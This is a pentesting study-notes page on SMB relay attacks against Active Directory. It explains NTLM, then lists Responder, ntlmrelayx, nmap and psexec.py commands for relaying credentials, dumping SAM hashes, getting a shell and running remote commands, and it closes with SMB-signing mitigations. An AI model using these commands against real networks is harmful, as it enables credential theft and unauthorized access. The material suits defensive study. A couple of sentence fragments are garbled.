Security Notes
  • Whoami
  • Pentesting
    • WEP-Pen
      • Reconnaissance
      • Enumeration
      • OWSAP TOP 10
        • Injection
          • Cross Site Scripting
            • Cross Site Scripting
            • Exploitation
            • Protections
          • SQL Injection
            • SQL Injection Overview
          • NoSQL Injection
          • CRLF Injection
          • XML Injection
        • Broken Access Control
          • Path Traversal
          • Sensitive Cookie with Improper SameSite Attribute
          • Link Following
          • Incorrect Default Permissions
          • Information disclosure
          • CSRF
            • csrf checklist
          • 403 bypass
          • Exposure of WSDL File Containing Sensitive Information
          • bussiness logic checklist
          • 2FA bypass checklist
          • admin panal checklist
          • idor checklist
          • Authentication checklist
          • reset_password_checklist
          • ATO
        • Cryptographic Failures
          • Cryptographic Failure
          • Weak Encoding for Password
          • Improper Following of a Certificate's Chain of Trust
            • Understanding Digital Certificates : Self-Signed and CA-Signed Certificate **
            • Transport Layer Security (TLS) and SSL **
          • Clear Text Transmission Of Sensitive Data
            • SSLStripping **
        • Insecure Design
        • Security Misconfiguration
          • CORS Miscofigration
          • Mail Server Misconfiguration
        • Vulnerable and Outdated Components
          • Using Components with Known Vulnerabilities
        • Identification and Authentication Failures
          • JWT Hacking
          • SAML Authentication bypass
        • Software and Data Integrity Failures
          • mass assignment
          • PostMessage Vulnerabilities
            • PostMessage Vulnerabilities
            • Blocking main page to steal postmessage
            • Bypassing SOP with Iframes - part 1
            • Bypassing SOP with Iframes - part 2
            • Steal postmessage modifying iframe location
        • Security Logging and Monitoring Failures
        • Server-Side Request Forgery (SSRF)
          • SSRF
      • Checklists
        • aem misconfiguration
        • exif_geo
        • xss
        • Session Management
        • Authorization
        • cookie
        • Django
        • Symfony
        • json
        • bypass rate limit
        • Rce
        • Register Page
      • eWPTXv2 Preparation
        • Encoding & Filtering
        • Evasion Basics
        • Cross-site scripting (XSS)
        • XSS Filter Evasion
        • Cross-site request forgery (CSRF
        • HTML5
      • API-Pen
        • API Discovry
        • Reverse Engineering API Documentation
        • Excessive Data Exposure
        • Vulnerability Scanning
        • API Authentication Attacks
          • Classic Authentication Attacks
          • API Token Attacks
        • API Authorization Attacks
          • Broken Object Level Authorization (BOLA)
          • Broken Function Level Authorization
        • Improper Assets Management
        • Mass Assignment
        • SSRF
        • Injection Attacks in API
        • Evasive Maneuvers
        • GraphQL Vulnerabilities
    • NET-Pen
      • Active Directory Pentesting
        • Active Directory Components
        • Initial Attack Vectors
          • LLMNR Poisoning
          • SMB Relay Attacks
          • IPv6 Attacks ( IPv6 DNS Takeover )
          • Printer Hacking
          • Methodology
          • Some Other Attacks
            • Zerologon (CVE-2020-1472)
            • PrintNightmare (CVE-2021-1675)
        • Post-Compromise Attacks
          • Pass Attacks
          • Kerberoasting Attack
          • Token Impersonation Attack
          • LNK File Attack
          • GPP / cPassword Attacks
          • Mimikatz
          • Methodology
        • We've Compromised the Domain
          • Dumping the NTDS.dit
          • Golden Ticket Attacks
          • Methodology
        • Case Study
        • Password Attacks
      • Attack Vectors by Port
        • FTP 21
        • SSH 22
        • Telnet 23 - 2323
        • SMTP 25
        • DNS 53
        • Kerberos 88
        • POP 110-995
        • RPC 111
        • Ident 113
        • NNTP 119
        • NetBIOS 137-138
        • SMB / Samba 135-139, 445
        • MSRPC 135
        • SNMP 161
        • LDAP 389,636
        • Modbus 502
        • OpenSSL 1337
        • Ms-SQL 1433
        • Oracle Listener 1521 1522 1529
        • NFS 2049
        • MySql 3306
        • RDP 3389
        • ADB Android Debug Bridge 5555
        • WinRM 5985 5986
        • VNC 5800 5900
        • Redis 6379
        • Unreal IRC 6667
        • Tomcat 8080
        • MongoDB 27017
        • http 80
      • Network basics
      • Information Gathering
      • Privilege Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
    • write-ups
      • How i found a Privilege Escalation via Impersonation Features feature
      • How I was able to discover ATO Via IDOR vulnerability
      • Easy full Account Takeover via Facebook OAuth Misconfiguration
Powered by GitBook
On this page
  1. Pentesting
  2. NET-Pen
  3. Active Directory Pentesting
  4. Initial Attack Vectors

SMB Relay Attacks

When cracking a victim’s password hash becomes impractical, such as in cases where companies enforce strong password policies like 21-character requirements or something, attackers can use SMB relaying attacks to bypass this obstacle and still gain unauthorized access.

What is SMB?

Server Message Block (SMB) is a protocol used for network file sharing that enables devices within the same network to access shared resources like files and printers. It operates on the Application and Presentation Layers and typically uses port 445. SMB requires users to authenticate before accessing resources, and this authentication is often based on the NTLM protocol (usually NTLMv2).

How NTLM Authentication Works

NTLM (NT LAN Manager) is a challenge-response authentication protocol used in Windows. Here's how it works:

  1. When a client requests access to a service, the service sends a random challenge (nonce).

  2. The client encrypts this challenge using its password hash and sends it back.

  3. The service forwards the encrypted challenge and the clear-text challenge to the Domain Controller (DC).

  4. The DC, which stores all user and resource hashes, encrypts the challenge with the user’s hash.

  5. If the encrypted challenge matches the one sent by the client, access is granted.onnecting to their malicious system instead of the intended server.

The Attack Process (SMB Relaying)

The attacker doesn't crack the password. Instead, they just "relay" the challenge and response between the victim and another server. Here's how:

  1. Intercept Connection: The attacker tricks the victim's device into connecting to them instead of the real server. This could be done by:

    • Responding to broadcast requests (e.g., LLMNR poisoning).

    • Spoofing a network resource.

  2. Get the Challenge: The attacker forwards the victim’s login request to a target server. The target server sends its challenge back (just like normal).

  3. Relay the Challenge: The attacker forwards this challenge to the victim. The victim, believing it is from the real server, encrypts it with their password hash and sends the response.

  4. Authenticate as the Victim: The attacker sends the victim’s response to the target server. Since the response matches the challenge, the target server thinks the victim has logged in.

For this attack to work, the following conditions must be met:

  1. Same Network

  2. LLMNR Enabled

  3. SMB Signing Disabled/Not Required

  4. Elevated User ( root - admin ) Hash

Exploiting SMB (AKA SMB Relay Attacks)

Step 1: The Attacker Identifies Workstations without SMB Signing Enforced

nmap --script=smb2-security-mode.nse -p445 10.10.10.0/24

"Message signing enabled but not required."

Message signing used to add a digital signature to every SMB message to prevent tampering and verify the sender. Without it enforced, attackers can exploit SMB relaying attacks. By default, Windows enables it but doesn't require it, leaving systems vulnerable.

Step 2: The Attacker Sets Up Their Attack

First, we need to configure Responder and ntlmrelayx fto avoid responding to directly, so it can relay those requests to ntlmrelayx.

sudo nano  /etc/responder/Responder.conf

Next, launch Responder.

sudo responder –I eth0 -dwP

Finally, launch ntlmrelayx and wait for an event to occur.

sudo ntlmrelayx.py –tf targets.txt –smb2support

Step 3: An Event Occurs and Credentials Get Relayed

Behind the scenes, an event (such as LLMNR poisoning) has occurred. Responder will capture this event, pass it to ntlmrelayx, which will relay the credentials to the targets in our targets file.

Below is what a successful relay looks like.

As you can see here, the local SAM hashes (the password hashes from the victim machine) dumped to the terminal. You can either crack these hashes offline or, more effectively, use pass-the-hash attacks to gain access to the victim machine without needing to know the actual password.

the beauty of relay attacks is that you do not need to ever know the password to pull off the attack. So much for a good password policy!

Gain Shell Access or Run Commands

While gaining a shell on the target is not always necessary for a successful SMB relay attack, it can be a valuable option to have in certain scenarios, especially when further manual actions are required in the target environment.

With ntlmrelayx, you can also attempt to gain shell access or run arbitrary commands on the victim machine.

sudo ntlmrelayx.py –tf targets.txt –smb2support -i
nc 127.0.0.1 11000

We can also run commands remotely. To run a command (e.g., whoami) on the victim machine during the attack:

sudo ntlmrelayx –tf targets.txt –smb2support –c “whoami”

While tools like Metasploit can be used for post-exploitation tasks, they are sometimes detected by security systems. An effective alternative is psexec.py, which can also leverage the victim’s hash to execute commands. For example:

psexec.py administrator@10.0.0.25 -hashes <hash>

there also a few other tool like wmiexec.py and smbexec depends on the target’s environment and security measures.

How Can SMB Relay Attacks Be Mitigated?

Main Defense: Enable SMB Signing

  • Pros: Completely stops SMB relay attacks.

  • Cons: May cause performance issues, especially with SMBv1 and legacy devices.

To configure Active Directory to enforce SMB signing, enable the following policies in Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options:

  • Client-side:

    • Microsoft network client: Digitally sign communications (always)

    • Microsoft network client: Digitally sign communications (if server agrees)

  • Server-side:

    • Microsoft network server: Digitally sign communications (always)

    • Microsoft network server: Digitally sign communications (if client agrees)

Confirming the Mitigation Run this command to verify SMB signing is enabled:

reg query HKLM\System\CurrentControlSet\Services\LanManServer\Parameters | findstr /I securitysignature

If the result shows ‘0x1’, SMB signing is active.

Alternate Defenses

  • Account tiering: Separate admin accounts (e.g., “bob” and “bob-da”) to limit access based on task needs.

  • Local admin restrictions: Limit local admin access to reduce the effectiveness of relay attacks.

PreviousLLMNR PoisoningNextIPv6 Attacks ( IPv6 DNS Takeover )

Last updated 6 months ago

nsure that SMB and HTTP responses are set to off